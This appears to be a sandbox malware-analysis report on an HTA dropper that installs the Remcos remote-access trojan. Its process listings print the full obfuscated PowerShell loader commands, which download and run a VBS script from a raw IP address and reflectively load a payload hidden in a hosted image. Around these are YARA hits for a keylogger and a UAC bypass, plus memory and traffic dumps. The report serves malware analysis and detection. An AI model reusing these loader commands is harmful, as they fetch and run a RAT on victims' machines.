75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35 51 64 4f 47 6e 44 70 35 38 5a
                                                                                                          Data Ascii: eKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45QdOGnDp58Z
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44 67 50 7a 34 44 46 39 63 66 50
                                                                                                          Data Ascii: KTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75 36 44 71 2b 49 71 50 63
                                                                                                          Data Ascii: jowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6Dq+IqPc


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:01:21:57
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta"
                                                                                                          Imagebase:0x630000
                                                                                                          File size:13'312 bytes
                                                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:01:21:58
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                                                                                                          Imagebase:0x1c0000
                                                                                                          File size:236'544 bytes
                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:01:21:58
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:01:21:58
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                                                                                                          Imagebase:0x370000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:01:22:00
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
                                                                                                          Imagebase:0xb40000
                                                                                                          File size:2'141'552 bytes
                                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:01:22:00
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"
                                                                                                          Imagebase:0xe50000
                                                                                                          File size:46'832 bytes
                                                                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:01:22:06
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
                                                                                                          Imagebase:0x550000
                                                                                                          File size:147'456 bytes
                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:01:22:07
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
                                                                                                          Imagebase:0x370000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:01:22:07
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:12
                                                                                                          Start time:01:22:34
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                          Imagebase:0xe20000
                                                                                                          File size:108'664 bytes
                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Reset < >
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2124563594.0000000006750000.00000010.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6750000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fb02d1b160cfa5c8e923864d96424c57270382bf332d1949e248403fa8389f5e
                                                                                                            • Instruction ID: 30442647d4823dc3da03d1a86f8b17c1bdb09f5659435f2c71bf82ef17b45e5d
                                                                                                            • Opcode Fuzzy Hash: fb02d1b160cfa5c8e923864d96424c57270382bf332d1949e248403fa8389f5e
                                                                                                            • Instruction Fuzzy Hash: 6701F771E003019FEB518FA888D17EE7BF99F0D720F190469EA04EB241E2B4598287A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2124586557.0000000006390000.00000010.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6390000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction ID: 34063178c4b53982239d05e021104c81accd771b5c6240d5847af7ba48689247
                                                                                                            • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2124586557.0000000006390000.00000010.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6390000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction ID: 34063178c4b53982239d05e021104c81accd771b5c6240d5847af7ba48689247
                                                                                                            • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2124586557.0000000006390000.00000010.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6390000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction ID: 34063178c4b53982239d05e021104c81accd771b5c6240d5847af7ba48689247
                                                                                                            • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2124586557.0000000006390000.00000010.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6390000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction ID: 34063178c4b53982239d05e021104c81accd771b5c6240d5847af7ba48689247
                                                                                                            • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction Fuzzy Hash:

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.5%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:71
                                                                                                            Total number of Limit Nodes:11
                                                                                                            execution_graph 10190 47c7480 10191 47c75fe 10190->10191 10192 47c74be 10190->10192 10192->10191 10199 47c7da8 10192->10199 10204 47c7c45 10192->10204 10213 47c7a08 10192->10213 10223 47c7a18 10192->10223 10233 47c77e8 10192->10233 10193 47c75df 10200 47c7cf9 10199->10200 10200->10199 10243 7204610 10200->10243 10252 72045ac 10200->10252 10262 72045f4 10200->10262 10205 47c7b9a 10204->10205 10209 47c7c5e 10204->10209 10205->10204 10206 47c7de8 URLDownloadToFileW 10205->10206 10208 47c7ea8 10206->10208 10208->10193 10210 7204610 4 API calls 10209->10210 10211 72045f4 4 API calls 10209->10211 10212 72045ac 4 API calls 10209->10212 10210->10209 10211->10209 10212->10209 10218 47c7a18 10213->10218 10214 47c7de8 URLDownloadToFileW 10217 47c7ea8 10214->10217 10215 47c7b30 10215->10193 10217->10193 10218->10214 10218->10215 10219 47c7c5e 10218->10219 10220 7204610 4 API calls 10219->10220 10221 72045f4 4 API calls 10219->10221 10222 72045ac 4 API calls 10219->10222 10220->10219 10221->10219 10222->10219 10224 47c7a4c 10223->10224 10225 47c7de8 URLDownloadToFileW 10224->10225 10226 47c7b30 10224->10226 10229 47c7c5e 10224->10229 10228 47c7ea8 10225->10228 10226->10193 10228->10193 10230 7204610 4 API calls 10229->10230 10231 72045f4 4 API calls 10229->10231 10232 72045ac 4 API calls 10229->10232 10230->10229 10231->10229 10232->10229 10238 47c77ed 10233->10238 10234 47c7de8 URLDownloadToFileW 10237 47c7ea8 10234->10237 10235 47c7b30 10235->10193 10237->10193 10238->10234 10238->10235 10239 47c7c5e 10238->10239 10240 7204610 4 API calls 10239->10240 10241 72045f4 4 API calls 10239->10241 10242 72045ac 4 API calls 10239->10242 10240->10239 10241->10239 10242->10239 10244 7204a93 10243->10244 10245 7204641 10243->10245 10244->10200 10245->10244 10247 47c77e8 5 API calls 10245->10247 10248 47c7a18 5 API calls 10245->10248 10249 47c7a08 5 API calls 10245->10249 10250 47c7c45 5 API calls 10245->10250 10271 47c7e00 10245->10271 10246 7204a34 10246->10200 10247->10246 10248->10246 10249->10246 10250->10246 10253 72045c6 10252->10253 10254 7204633 10252->10254 10253->10200 10255 7204a93 10254->10255 10257 47c77e8 5 API calls 10254->10257 10258 47c7a18 5 API calls 10254->10258 10259 47c7a08 5 API calls 10254->10259 10260 47c7c45 5 API calls 10254->10260 10261 47c7e00 URLDownloadToFileW 10254->10261 10255->10200 10256 7204a34 10256->10200 10257->10256 10258->10256 10259->10256 10260->10256 10261->10256 10263 7204a93 10262->10263 10264 7204641 10262->10264 10263->10200 10264->10263 10266 47c77e8 5 API calls 10264->10266 10267 47c7a18 5 API calls 10264->10267 10268 47c7a08 5 API calls 10264->10268 10269 47c7c45 5 API calls 10264->10269 10270 47c7e00 